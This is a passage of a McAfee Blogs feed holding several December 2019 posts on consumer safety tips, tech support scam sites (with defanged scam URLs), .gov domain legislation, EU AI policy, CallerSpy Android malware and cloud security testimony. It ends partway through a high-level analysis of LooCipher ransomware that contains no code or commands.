Anytime there’s creativity, laughter, and a strong community forming online, it doesn’t take long for the shady side of humanity to show up and try to ruin the fun. By staying on top of app trends and getting involved on the front lines, parents can offer guidance and influence to their kids when they need it most.

The post Parents: You May Want to Pay Closer Attention to the TikTok App appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/parents-you-may-want-to-pay-closer-attention-to-the-tiktok-app/feed/ 0
750K Birth Certificate Applications Exposed Online: 5 Tips to Help You Stay Secure https://www.mcafee.com/blogs/consumer/consumer-threat-notices/750k-birth-certificate-applications-exposed/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/750k-birth-certificate-applications-exposed/#respond Thu, 12 Dec 2019 22:53:11 +0000 /blogs/?p=97788

Most people applying for birth certificates aren’t thinking that their private information will be made readily available to the public. But according to Tech Crunch, an online company that allows users to obtain a copy of their loved one’s birth and death certificates from U.S. state governments has exposed over 752,000 applications for copies of […]

The post 750K Birth Certificate Applications Exposed Online: 5 Tips to Help You Stay Secure appeared first on McAfee Blogs.

]]>

Most people applying for birth certificates aren’t thinking that their private information will be made readily available to the public. But according to Tech Crunch, an online company that allows users to obtain a copy of their loved one’s birth and death certificates from U.S. state governments has exposed over 752,000 applications for copies of birth certificates and 90,400 death certificate applications.

Although each application process differed by state, they all allowed customers to apply to their state’s record-keeping authority. The applications contained personally identifiable information such as the applicant’s name, date of birth, current home address, and more. What’s more, the applications stored in the online bucket dated back to late 2017 and were updated daily, creating a robust treasure trove for cybercriminals.

Due to the high amount of consumer data provided by people requesting copies of birth certificates or registering their newborn children, the exposure of these applications is a cybercriminal’s dream come true. If a criminal did get a hold of this information, the information would likely be posted for sale on the Dark Web. From there, other malicious actors could purchase the data and use it to impersonate others or commit identity theft.

Tech Crunch and the security researchers who discovered the exposed data attempted to inform the company responsible but have not yet received a response. So, in the meantime, here are some steps users can follow to help protect their personal information now and in the future:

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Watch out for other cyberattacks. Be on high alert for malicious attacks where cybercriminals could use stolen credentials to exploit users, such as spear phishing.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 750K Birth Certificate Applications Exposed Online: 5 Tips to Help You Stay Secure appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/750k-birth-certificate-applications-exposed/feed/ 0
Top Tips to Spot Tech Support Scams https://www.mcafee.com/blogs/other-blogs/mcafee-labs/top-tips-to-spot-tech-support-scams/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/top-tips-to-spot-tech-support-scams/#respond Thu, 12 Dec 2019 16:35:48 +0000 /blogs/?p=97697

There are number of ways scammers use to target your money or personal details.  These scams include support sites for services such as Office365, iCloud, Gmail, etc. They will charge you for the service and steal your credit card details. Software activation scam sites will steal your activation code and they may resell it at a […]

The post Top Tips to Spot Tech Support Scams appeared first on McAfee Blogs.

]]>

There are number of ways scammers use to target your money or personal details.  These scams include support sites for services such as Office365, iCloud, Gmail, etc. They will charge you for the service and steal your credit card details. Software activation scam sites will steal your activation code and they may resell it at a low cost.

There have been many articles about these types of scams, including one we posted earlier this year about support scams – https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/mcafee-customer-support-scam.

In this article, we would like to provide more examples of the scam sites and tips to help you spot them and avoid entering your personal information.

Scam sites may include these major services’ names in their domains, and include links for the official sites, to appear like legitimate (authorized) support for these companies.

The screenshots below are examples of various types of scam sites.

This one is an example of a software activation scam site. It targets users who are confused about how to set up their software. As shown below, the scammer asks users to enter their personal information and the activation key, pretending to help with the software setup.

On the same page, it provides the details on how to find the activation key and how to set up the software.

After following these steps and entering the personal information, you get an error as shown in the screen shot below.

At this time, the scammer has already received the user’s information, which could then be used for financial gain. As the error occurs, they expect the user to call the numbers above and they will charge the user for that call, even though they can get the same service for free from the respective software companies. This activation code can then be sold at a low cost on pirated software sites.

When you encounter a site which you suspect to be a support scam, try Googling its phone number. You may be surprised that a lot more of other support scam sites with the same phone number will appear in the results. In this example, the same number is linked to at least 4 other support scams.

For these sites, they have the same appearance as shown in the screenshot below.

The below screenshot shows a typical scam site that tries to mimic the official site but is not as professional. It only provides the phone number and contact form, and nothing else.

 

Users may encounter these sites in various ways:

  • By clicking on links from unsolicited emails.
  • From pop-up ads from risky sites such as illegal movie streams.
  • Ad campaign pop-ups from otherwise legitimate sites that have had malicious ads injected or not thoroughly vetted.
  • Advertised in online classified ads, forum posts and blog sites.
  • Advertised in Social media sites such as Facebook, Reddit, YouTube and Tumblr.

One way to be sure that you have the correct contact information is to get it from the legitimate website.  When you search for the contact information, always make sure that the search result shows the link to the respective organization.  Please be aware that this may not always come up on top of your search.

When you click the link in the search result, make sure that you land on the expected site.

Advice to Consumers:

Online users should be careful in their choices of trying to get technical support and activation setup.

Consumers should be aware that these companies will not send unsolicited email messages or unsolicited phone calls to request users’ personal or financial information to offer technical support to fix their computer or for activation setup.

As highlighted in this blog, a user will often be presented with a fake error screen to be tricked into calling a premium rate phone number. Warnings or error messages from legitimate companies never include their phone numbers.

Users do not have to pay for such a service which they can get from the respective companies directly for free. Also, software companies will never ask you to pay with Bitcoin or gift cards. Users should only use the official website and, if unsure, they should contact the official website via its contact form.

These tech support domains may be registered in various countries. Their lifespan may be short, like a year or two. Just for the examples listed in this article, the average domain life cycle was 2.1 years. They mimic the look and feel of the official web sites by copying the logo and other graphics, but they are often not quite as professional looking as the official ones.

If you find suspected scam sites, please submit them to McAfee for review at https://trustedsource.org as well as reporting to your local law enforcement.

The Below Discovered and Analyzed URLs are Covered By WebAdvisor

hxxps://www-norton-com-setup.xyz
hxxp://nortoncomsetup.co/
<hxxp://mcafeeactivate.support
hxxp://www.yourpcassistant.com
hxxp://manage-norton-setup.com/
hxxp://contacttechassistance.com/
hxxps://i123hp.com
hxxps://canon.com-ijsetup.com
hxxp://www.mydragonsupport.com
hxxps://www.retail-cards.com/
hxxps://wwwofficesetup.com/
hxxps://how-tosetup.com/
hxxps://www.sbcglobalsupportnumber.com
hxxps://acersupportnumber.com
hxxps://www.canonsupportnumber.org/
hxxps://applesupportnumber.net/
hxxp://mssetup.com
hxxp://officecomsetup.support
hxxp://wwwofficesetup.com
hxxp://howtoactivatemcafee.com
hxxp://www-mcafee-com-activate.co.uk

The post Top Tips to Spot Tech Support Scams appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/top-tips-to-spot-tech-support-scams/feed/ 0
DOTGOV Online Trust in Government Legislation is Critical to Improving Election Security https://www.mcafee.com/blogs/other-blogs/executive-perspectives/dotgov-online-trust-in-government-legislation-is-critical-to-improving-election-security/ https://www.mcafee.com/blogs/other-blogs/executive-perspectives/dotgov-online-trust-in-government-legislation-is-critical-to-improving-election-security/#respond Tue, 10 Dec 2019 16:00:44 +0000 /blogs/?p=97777

In November, the Senate Homeland Security Committee approved the bipartisan DOTGOV Online Trust in Government Act of 2019 (S. 2749), legislation introduced by Senators Gary Peters (D-MI), Ron Johnson (R-WI), Amy Klobuchar (D-MN) and James Lankford (R-OK) to help state and local governments transition to a .gov domain. The program is funded through the Department […]

The post DOTGOV Online Trust in Government Legislation is Critical to Improving Election Security appeared first on McAfee Blogs.

]]>

In November, the Senate Homeland Security Committee approved the bipartisan DOTGOV Online Trust in Government Act of 2019 (S. 2749), legislation introduced by Senators Gary Peters (D-MI), Ron Johnson (R-WI), Amy Klobuchar (D-MN) and James Lankford (R-OK) to help state and local governments transition to a .gov domain. The program is funded through the Department of Homeland Security’s (DHS) Homeland Security Grant Program and is a key step toward improving cybersecurity and making it easier for citizens and businesses to differentiate between legitimate websites and ones set up by bad actors. With the 2020 elections fast approaching, it is more important than ever that state and local governments transition to government validated web domains to avoid election tampering and disinformation.

The security of elections depends on solid election infrastructure and sound cybersecurity practices. An attack to the U.S. election infrastructure does not require the hacking of physical voting machines or tampering with ballots. Instead, attackers can utilize disinformation campaigns to focus on vulnerable gaps at the county and state levels, where many constituents get information online from their local election boards.

Last year, McAfee released research on the security of election infrastructure at the individual county and state levels. The research revealed that the majority of local county government and county election board websites were using poorly validated domain names using .com, .net and .us, rather than government validated .gov domain names, which must pass a U.S. federal government validation process.

Bad actors looking to tilt an election outcome can easily set up fraudulent local election sites using the easier-to-obtain domain names and spread disinformation about polling locations or voting procedures through bogus email addresses. McAfee’s research into this issue since the 2018 midterm elections suggests that the lack of .gov usage could be a critical election security gap in states likely to be highly contested in the upcoming 2020 presidential election.

At McAfee, we believe that DHS should work closely with local governments to enable the widespread adoption of .gov domain environments. The DOTGOV Online Trust in Government Act is critical to protecting local and state governments from bad actors and encouraging states and localities to adopt a validated .gov domain. The provision in the legislation that enables States and local governments to leverage DHS grants to support their adoption of .gov domains makes a great deal of sense and needs to be funded in the President’s next budget.

The countdown to the 2020 elections is underway, and disinformation remains a top concern for election officials and lawmakers. DHS must ensure that government-validated election sites are easily identifiable by the public through increased use of .gov domains. This transition is a pivotal and necessary step toward improving the security of our election infrastructure.

The post DOTGOV Online Trust in Government Legislation is Critical to Improving Election Security appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/executive-perspectives/dotgov-online-trust-in-government-legislation-is-critical-to-improving-election-security/feed/ 0
Independent Research Firm Ranks CWS Vendors in Report: McAfee a Leader https://www.mcafee.com/blogs/enterprise/cloud-security/independent-research-firm-ranks-cws-vendors-in-report-mcafee-a-leader/ https://www.mcafee.com/blogs/enterprise/cloud-security/independent-research-firm-ranks-cws-vendors-in-report-mcafee-a-leader/#respond Mon, 09 Dec 2019 19:19:21 +0000 /blogs/?p=97764

Forrester, a leading independent research firm in the field of cybersecurity, recently published its inaugural WAVE report on Cloud Workload Security. We’re proud to report that McAfee was named a leader. The Forrester Wave evaluates and ranks products in the CWS category against 30 pre-defined criteria. The report provides security leaders with evaluations of the […]

The post Independent Research Firm Ranks CWS Vendors in Report: McAfee a Leader appeared first on McAfee Blogs.

]]>

Forrester, a leading independent research firm in the field of cybersecurity, recently published its inaugural WAVE report on Cloud Workload Security. We’re proud to report that McAfee was named a leader.

The Forrester Wave evaluates and ranks products in the CWS category against 30 pre-defined criteria. The report provides security leaders with evaluations of the 13 providers that matter most and how they stack up. Forrester conducted a detailed technical evaluation of each product, as well as an analysis of each provider’s market presence and strategy. In its findings, Forrester said that support for containerization and OS-level protection were key differentiators.  Forrester also says, “Vendors that can provide cloud and on-premises-based CWS solutions position themselves to successfully deliver comprehensive cloud workload protection and posture management to their customers.” Download your complimentary copy here.

In this first CWS Wave report, authored by Forrester Vice President, Principal Analyst Andras Cser with Merritt Maxim, Matthew Flug, and Peggy Dostie, McAfee is designated a leader. McAfee Cloud Workload Security (CWS) and MVISION Cloud Security contributed to McAfee receiving the highest score possible in the categories of:

 

Current offering:

  • Operating system-level workload protection
  •  Users and roles
  •  API-level connectivity and control for IaaS and PaaS
  • Hypervisor protection
Strategy

  • Centralized agent framework plans
  • API control for IaaS and PaaS plans
  • Hypervisor protection plans
  • Threat detection and auditing plans
  • Services and partners
  • Sales staffing
  • Support staffing
  • Pricing terms and flexibility

 

McAfee was recognized for its coverage of guest OS and API platforms, for McAfee ePolicy Orchestrator, which offers comprehensive and centralized control of CWS policies, as well as for comprehensive memory integrity monitoring, DLP scans for sensitive information for AWS S3 buckets and Azure blobs, as well as automatic warning of vulnerabilities based on fingerprinting good container images. McAfee was the only vendor to score a 5 out of 5 in the Threat Detection and Auditing plans criterion.

Evaluation Summary

The Forrester Wave™ evaluation highlights Leaders, Strong Performers, Contenders, and Challengers. It’s an assessment of the top vendors in the market and doesn’t represent the entire vendor landscape.  From a vendor perspective, the amount of time and resources Forrester spends to evaluate vendors is significant. The process is designed to cut through marketing hype and validate every vendor claim in much the same way a large enterprise might evaluate solutions. In some ways, Forrester’s evaluation is even more rigorous than the typical IT procurement process.

McAfee CWS enables users to quickly and easily discover, visualize, protect, and simplify security management across all IT (physical, virtual, and public, private and hybrid cloud environments). Learn how McAfee Cloud Workload Security can help you reduce complexity, accelerate response times, maximize investments and accelerate business success.

Learn more about McAfee Cloud Workload Security, and download your complimentary copy here.

The post Independent Research Firm Ranks CWS Vendors in Report: McAfee a Leader appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/cloud-security/independent-research-firm-ranks-cws-vendors-in-report-mcafee-a-leader/feed/ 0
Cybersecurity & Artificial Intelligence (AI) – a view from the EU Rear Window, Part II https://www.mcafee.com/blogs/enterprise/data-security/cybersecurity-artificial-intelligence-ai-a-view-from-the-eu-rear-window-part-ii/ https://www.mcafee.com/blogs/enterprise/data-security/cybersecurity-artificial-intelligence-ai-a-view-from-the-eu-rear-window-part-ii/#respond Mon, 09 Dec 2019 16:00:14 +0000 /blogs/?p=97669

In Part I of this blog, we discussed the debate around AI: what it is, whether it exists, and to what extent it plays a role in our daily lives. In Part II, we turn our focus to the future, and how AI must be developed deliberately and thoughtfully to provide the greatest benefit to […]

The post Cybersecurity & Artificial Intelligence (AI) – a view from the EU Rear Window, Part II appeared first on McAfee Blogs.

]]>

In Part I of this blog, we discussed the debate around AI: what it is, whether it exists, and to what extent it plays a role in our daily lives. In Part II, we turn our focus to the future, and how AI must be developed deliberately and thoughtfully to provide the greatest benefit to humanity.

A strategic, economic and political challenge

There is absolutely no doubt that AI is a strategic, economic and political issue. On Feb. 12, 2019, the European Parliament adopted a comprehensive European industrial policy on AI and robotics. The motion notes that AI promotes innovation, productivity, economic growth and competitiveness; reshapes multiple industrial sectors; and  can help address global challenges such as health or the environment. The goal of the Parliament is to facilitate the development of AI technologies by implementing a single European market for AI and removing barriers to the deployment of AI, including through the principle of mutual recognition with regards to the cross-border use of smart products. Clearly, the goal is to allow the European Union to compete with mass investments made by third parties, especially the United States and China.

On top of this, it recommends creating a European Regulatory Agency for AI and Algorithmic Decision Making.

A strong initiative to integrate ethics in AI

The Motion highlights the importance of deploying a “trusted AI” coupled with ethical principles to enable responsible competitiveness as it will build user trust and facilitate wider adoption of AI. Parliament believes that the European Union must play a “leading role on the international stage” by establishing itself as a leader for an ethical, safe and advanced AI.

The reason why the main actors want ethics to be integrated into AI is that there is a need to guarantee, from the design stage, the transparency and the explicability of the algorithms, in order to prevent any discrimination linked to automated decision-making. This concern is echoed by Article 22 of the EU Reg 2016 /679 (“GDPR”): “The data subject shall have the right not to be subject to a decision based solely on automated processing, including profiling, which produces legal effects concerning him or her or similarly significantly affects him or her.”

AI is to be designed as a tool that helps and is controlled by humans aligned on fundamental rights such as dignity, autonomy, self-determination and non-discrimination. The European Commission published draft guidelines on ethics in the field of AI on December 18, 2018.

A Legal Framework for AI

The Motion stresses the need to develop a strategic regulatory environment for AI and robotics that encourages both technological innovation and strong user protection. Parliament refers to Europe’s ambition to be a pioneer in this area, hence the importance of “regularly reassessing existing legislation in order to ensure that it is appropriate to its objective as far as Europe is concerned.”

The first issue raised by the Parliament is the need to combine the GDPR with the development of AI. The key for developing AI is the trust of its users, and there can be no trust by the users if their personal data is not strongly protected. The EU Parliament argues that “the establishment of an ecosystem of trust in the development of AI technologies should be based on an appropriate data processing framework,” which implies full respect of the EU legal framework in concerning the protection of personal data, i.e., the GDPR.

The resolution also stresses the lack of specific provisions on liability and intellectual property, which undermines legal certainty. Liability in the field of AI clearly remains a grey area.

What about AI in the field of Cybersecurity?

The European Parliament highlights that “AI can both be a threat to cybersecurity and the main tool against cyber-attacks.” There is a need to ensure the integrity of the data and algorithms on which the AI is based, including “product safety checks by market surveillance authorities and consumer protection rules that implement place, whit appropriate minimum safety standards.” Simultaneously, the Motion recognizes that “the deployment of solutions integrating AI for cybersecurity purposes will make it possible to predict threats, prevent them and mitigate.”

The Parliament stresses again the importance of developing its own cybersecurity independence by developing “its own infrastructure, data centers and systems of cloud computing and its own computer components.” Some even view it as a founding element of European numerical sovereignty.

Ultimately, AI may become the next big privacy trend. Just as big data made every single company a data company, many believe that the new era of AI will transform every company into an AI company. When thinking about AI, the first thing that pops into people’s mind are autonomous vehicles and smart robots, but the legal and privacy implications are far wider, potentially impacting every single industry, from consumer goods to healthcare to financial services—without forgetting, of course, cybersecurity.

I bet you next thing you know, we will have an official EU Commission position on the legitimate interest of processing personal data for the sake of AI in the field of cybersecurity. And hopefully ethics—recognized at international level—will provide the required boundaries for a safe and transparent use of AI.

The post Cybersecurity & Artificial Intelligence (AI) – a view from the EU Rear Window, Part II appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/data-security/cybersecurity-artificial-intelligence-ai-a-view-from-the-eu-rear-window-part-ii/feed/ 0
7 Tips to Make Sure Your Smartphone Use Doesn’t Ruin Holiday Gatherings https://www.mcafee.com/blogs/consumer/family-safety/tips-to-make-sure-smartphone-use-doesnt-ruin-holiday-gatherings/ https://www.mcafee.com/blogs/consumer/family-safety/tips-to-make-sure-smartphone-use-doesnt-ruin-holiday-gatherings/#respond Sat, 07 Dec 2019 15:00:07 +0000 /blogs/?p=97745 technology addiction

The gravy wasn’t the only thing steaming at the Thanksgiving table this year. Grandma wasn’t happy. It turns out that those shapes that looked like socks draped over the living room furniture were actually teenagers glued to their smartphones — teenagers Grandma had repeatedly asked to set the table. And if you knew Grandma, you […]

The post 7 Tips to Make Sure Your Smartphone Use Doesn’t Ruin Holiday Gatherings appeared first on McAfee Blogs.

]]>
technology addiction

The gravy wasn’t the only thing steaming at the Thanksgiving table this year. Grandma wasn’t happy. It turns out that those shapes that looked like socks draped over the living room furniture were actually teenagers glued to their smartphones — teenagers Grandma had repeatedly asked to set the table.

And if you knew Grandma, you knew that she just wasn’t having it.

After a very awkward silence fell across our 20-person table, Grandma gave an impassioned speech on how smartphones are destroying the family connection and turning our kids into zombies. A lively discussion ensued and three generations defended their use (or non-use) of technology.

It’s a conversation, no doubt, that lights up countless dinner tables every day.

smartphone addiction

When the dust settled, it was Grandma’s wisdom that stuck. Here are the highlights:

There’s a time and a place for everything, but we’ve lost sight of that.
Giving people your undivided attention says, “you matter.”
Phones have become center stage, not people, not experiences, not manners.
How we spend our time is how we spending our lives.
We can’t get back the hours, days, and years we spend online. 

Grandma’s sentiments must have hit a nerve even with the teenagers. The next day phones were scarce. The conversation lingered, sometimes for hours. The laughter was ever-present. What we coined “Grandma’s turkey day tantrum” added a rich layer of genuine connection to our gathering.

Chances are you can relate to this story in some way. That’s because Grandma is onto something. Studies show technology is taking center stage for a lot of us.

 

So how does your smartphone use measure up? What tech habits are negatively affecting your relationships, your health, or your attitude? What steps can you take to change them?

7 tech tips to help save your holiday

Discuss expectations ahead of time. Have a short but specific family huddle to discuss when and where devices are allowed. Technology isn’t bad — issues arise with our personal choices in the way we use technology. Establish no-phone zones and be sure adults follow the rules as well.

No more phubbing. Phubbing is snubbing the person in front of you to carry on a text conversation on your phone. Make eye contact with the person in front of you. Leave your phone in another room or turn it face down to avoid the temptation of phubbing people over the holidays.

Listen. Learn. Like. Devices are magnetic because there are endless things to look at and engage with right at our fingertips. But try this: Turn your phone off and take in the picture and the people right in front of you. There’s a story behind every face, endless things to learn, and common ground to discover in your circle of family and friends. Be the person in the room asking more in-depth questions, listening intently, and giving people your thumbs ups and “likes” IRL (in real life).

Ask before posting (especially teens). They may not vocalize it but you can bet the teenager in the room is cringing inside when you get waaaay too excited about posting a selfie with them online. That’s because they are very, very picky with the pictures they choose to post because each one impacts how they come across to their peers online. Be sure to ask parents of younger kids before you post their picture online — it can be a bigger deal than you think.

Resist tech shaming. Family gatherings can include multiple generations that hold different opinions and perspectives about technology. To keep the peace (and avoid upsetting grandma), be sure to respect differing opinions and behaviors around technology. Be careful no one is made to feel shame for his or her tech habits.

Pay attention to emotions. Just as stressful situations can trigger overeating, certain feelings can prompt us to turn to our devices in lieu of engaging with the people around us. A recent study reveals that most people could barely last four hours with family before needing a break. Instead of turning to tech to escape, consider replacing that impulse with something else. Go for a walk, get a workout in, call a friend, or take a nap.

Check-in with teens. The holidays can amplify pressure for teens to make their holiday appear “picture perfect” online. If you notice moodiness or anxiety, spend some extra time with your child. Be aware that comparing his or her looks, material possessions, and unique experiences may be affecting your child’s mood. Help your child be present in the moment rather than creating moments to post online.

The most wonderful time of the year can also be the most complicated especially when technology is added to the mix. But remember, technology can’t ruin a holiday only our choices can. Here’s wishing you a very merry holiday filled with hours of genuine connection with the ones you love.

The post 7 Tips to Make Sure Your Smartphone Use Doesn’t Ruin Holiday Gatherings appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/tips-to-make-sure-smartphone-use-doesnt-ruin-holiday-gatherings/feed/ 0
Attention Android Users: Is CallerSpy Malware Spying on You? https://www.mcafee.com/blogs/consumer/consumer-threat-notices/android-callerspy-malware/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/android-callerspy-malware/#comments Fri, 06 Dec 2019 23:02:12 +0000 /blogs/?p=97767

Meet CallerSpy malware, a new form of mobile malware designed to snoop on calls, texts, and other smartphone communications. This trojan malware is targeting Android users by tricking them into downloading a fake chat app called Apex App. However, despite being advertised as a chat application, CallerSpy doesn’t really contain any chat capabilities. In fact, […]

The post Attention Android Users: Is CallerSpy Malware Spying on You? appeared first on McAfee Blogs.

]]>

Meet CallerSpy malware, a new form of mobile malware designed to snoop on calls, texts, and other smartphone communications. This trojan malware is targeting Android users by tricking them into downloading a fake chat app called Apex App. However, despite being advertised as a chat application, CallerSpy doesn’t really contain any chat capabilities. In fact, researchers describe the app as “riddled with espionage features.”

How exactly does this spy begin its reconnaissance mission? According to ZDNet, once the fake app is downloaded and launched, it connects to a server that directs the malware to start snooping on the device. From collecting call logs, text messages, contacts, and device files to being able to activate the phone’s microphone and taking screenshots, CallerSpy does it all. Once this data has been stolen, it’s then periodically uploaded to the cybercrook. And since cybersecurity researchers have only recently uncovered this malware, it is still unknown what this stolen data is being used for. What’s clear is that CallerSpy is no misnomer and users need to be prepared.

So, what are some proactive steps users can take to avoid being spied on by CallerSpy? Follow these tips to avoid this malware’s prying eye:

  • Watch what you download. The best way to know if an app is malicious or not is to check for typos and grammatical errors in the description, look at the download statistics, and read what other users are saying.
  • Be selective about which sites you visit. Only use reputable, well-known, and trusted sites. One way to determine if a site is potentially malicious is by checking its URL. If the URL address contains multiple grammar or spelling errors and suspicious characters, avoid interacting with the site altogether.
  • Surf the web securely. You can use a tool like McAfee WebAdvisor, which will flag any sites that may be malicious without your knowing. The best part – it’s free!

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Attention Android Users: Is CallerSpy Malware Spying on You? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/android-callerspy-malware/feed/ 1
Cloud Security and Artificial Intelligence in the Financial Sector https://www.mcafee.com/blogs/other-blogs/executive-perspectives/cloud-security-and-artificial-intelligence-in-the-financial-sector/ https://www.mcafee.com/blogs/other-blogs/executive-perspectives/cloud-security-and-artificial-intelligence-in-the-financial-sector/#respond Thu, 05 Dec 2019 16:00:13 +0000 /blogs/?p=97672

I recently had the honor of testifying before the House Financial Services Committee’s Taskforce on Artificial Intelligence about two critical emerging issues in the financial services sector – cloud and artificial intelligence (AI). Both have incredible potential for energizing the financial sector, but they also raise important security concerns. Financial services organizations are migrating to […]

The post Cloud Security and Artificial Intelligence in the Financial Sector appeared first on McAfee Blogs.

]]>

I recently had the honor of testifying before the House Financial Services Committee’s Taskforce on Artificial Intelligence about two critical emerging issues in the financial services sector – cloud and artificial intelligence (AI). Both have incredible potential for energizing the financial sector, but they also raise important security concerns.

Financial services organizations are migrating to the cloud to reduce complexity, cut costs, and focus their capabilities on delivering financial services to their customers. Leveraging the cloud, both large and small institutions benefit from advanced technology that is normally only available to those who can substantially invest in a highly technical workforce.

While cloud providers generally practice strong cyber hygiene, enabling quick responses to vulnerabilities and security incidents, there are also major security challenges with moving to cloud.

Because cloud providers service many clients, a single breach can place multiple organizations’ data at risk. Today, almost all organizations, including financial services, use multiple cloud providers, a trend that is making visibility into operations more challenging. To remediate this situation, organizations need solutions to manage visibility and monitor security between cloud service consumers and providers. Services like McAfee’s MVISION Cloud, a Cloud Access Security Broker (CASB), represent a critical new class of applications that are rapidly being adopted to manage and secure diverse cloud environments.

As with cloud, we must also understand the capabilities, limitations, and risks of AI. Financial services organizations are using AI and machine learning to enable advanced analytics that allows them to better serve and protect customers, while better managing overall cost.

As the new foundation for cyber defense, AI is enabling us to better detect threats and find the so-called “needle in a haystack of needles.” Additionally, AI-based automation is helping alleviate the cybersecurity talent shortage, enabling us to free up human security professionals to focus on the most critical aspects of cyber defense.

Unfortunately, AI can be used by our adversaries. Bad actors can use AI to identify the most vulnerable victims, automate phishing, and evade detection. AI improves their ability to execute attacks and enables content creation for use in social engineering and information warfare, such as deepfake videos. These and many other adversarial uses of AI can and will occur, putting our financial services sector as well as our democracy and civil society at risk.

To properly secure cloud and AI technology in the financial services sector, I recommended the Taskforce consider voluntary collaboration and the use of industry-supported standards and best practices such as the NIST Cybersecurity Framework. When appropriate, existing cybersecurity rules for highly regulated critical infrastructure industries should be updated to reflect the rapid speed of innovation.

While innovations in both cloud and artificial intelligence are and will continue to enhance the cybersecurity of the financial services and cloud sectors, these same innovations will progressively enable cyber hackers.

At McAfee, we look forward to working with Congress to help provide cybersecurity advice as the industry moves towards the adoption of cloud and artificial intelligence technologies.

A transcript of my testimony on the U.S. House Financial Services Committee’s Taskforce on Artificial Intelligence can be found here.

 

The post Cloud Security and Artificial Intelligence in the Financial Sector appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/executive-perspectives/cloud-security-and-artificial-intelligence-in-the-financial-sector/feed/ 0
Analysis of LooCipher, a New Ransomware Family Observed This Year https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/#respond Thu, 05 Dec 2019 15:00:19 +0000 /blogs/?p=97708

Initial Discovery This year seems to again be the year for ransomware. Notorious attacks were made using ransomware and new families are being detected almost on a weekly basis. The McAfee ATR team has now analyzed a new ransomware family with some special features we would like to showcase. LooCipher represents how a new actor […]

The post Analysis of LooCipher, a New Ransomware Family Observed This Year appeared first on McAfee Blogs.

]]>

Initial Discovery

This year seems to again be the year for ransomware. Notorious attacks were made using ransomware and new families are being detected almost on a weekly basis.

The McAfee ATR team has now analyzed a new ransomware family with some special features we would like to showcase. LooCipher represents how a new actor in an early stage of development used the same techniques of distribution as other players in the ransomware landscape. The design of the ransomware note reminded us of the old times of Cerber ransomware, a very well impacted design to force the user to pay the rescue.

Thanks to initiatives like the ‘No More Ransom’ project, one of the partners involved has already provided a valid decryptor to restore files encrypted by LooCipher.

McAfee Telemetry

Based on the data we manage, we detected LooCipher infections in the following regions:

Campaign Analysis:

Based on the analysis we performed, this ransomware was delivered through a DOC file. The content and techniques used with this MalDoc are quite simple compared to other doc files used to spread malware, such as Emotet. No special social engineering techniques were applied; the authors only put a simple message on it – “Enable macros”.

The file is prepared to download LooCipher from a remote server upon opening the file. We can see the Sub AutoOpen function as a macro in the document:

LooCipher will start its encryption routine using a predefined set of characters, creating a block of 16 bytes and using the local system hour:

The ransomware will use the AES-ECB encryption algorithm in the process and the key is the same for all the files which facilitates the file recovery process. Other ransomware families use a different key for each file to avoid the possibility of a brute force attack discovering the key used during the infection.

In the encryption process, the ransomware will avoid 3 special folders in the system so as to not break their functionality.

Encrypting key files and folders was one of the mistakes we highlighted in our analysis of LockerGoga; that ransomware was completely breaking the functionality of the system. Some binaries found were encrypting all the system, including the LockerGoga binary file.

Regarding the extensions that LooCipher will search and encrypt in the system, the list is hardcoded inside the binary:

It is quite interesting see how LooCipher searches for extensions that are not present in Windows systems like “.dmg.” This suggests that the authors may just be going to code sites to find extension lists.

In the analysis we found a PDB reference:

\\Users\\Usuario\\Documents\\Proyectos\\sher.lock\\Debug\\LooCipher.pdb

It is interesting to note that the reference found contains Spanish words, as if the user was using folders named in Spanish, however, the system is configured in English. We currently have no idea why this is so, but it is curious.

BTC payment is the method chosen by LooCipher authors to get money from the victims. So, at the end of the file’s encryption, the ransomware will show a rescue note to the user:

LooCipher decryptor will pop up in the system as well with a specific countdown:

In the ransom note LooCipher says the BTC address is specifically generated for the user but that is not true; all the BTC addresses we have seen are hardcoded in the binary:

This is another special characteristic for this ransomware. Normally, this workflow is providing an email address to contact the authors so they can provide the instructions to the victim, or at least a BTC address to make payment (if there is not a unique BTC address provided to every victim), something that is the main difference between RaaS and one-shot campaigns.

If we apply static analysis in the binaries we have, the same bundle of BTC addresses is included across most that we spot in the wild:

None of the BTC addresses found regarding LooCipher showed any transactions so we believe the authors did not monetize the campaign with the binaries we analyzed.

LooCipher and Network Traffic:

In the encryption process, LooCipher will contact the C2 server and send information about the victim:

The data sent to the server is:

Here, a copy of the network traffic could help the user to know the encryption key used.

Decryptor Fallback Mechanism Implemented by LooCipher

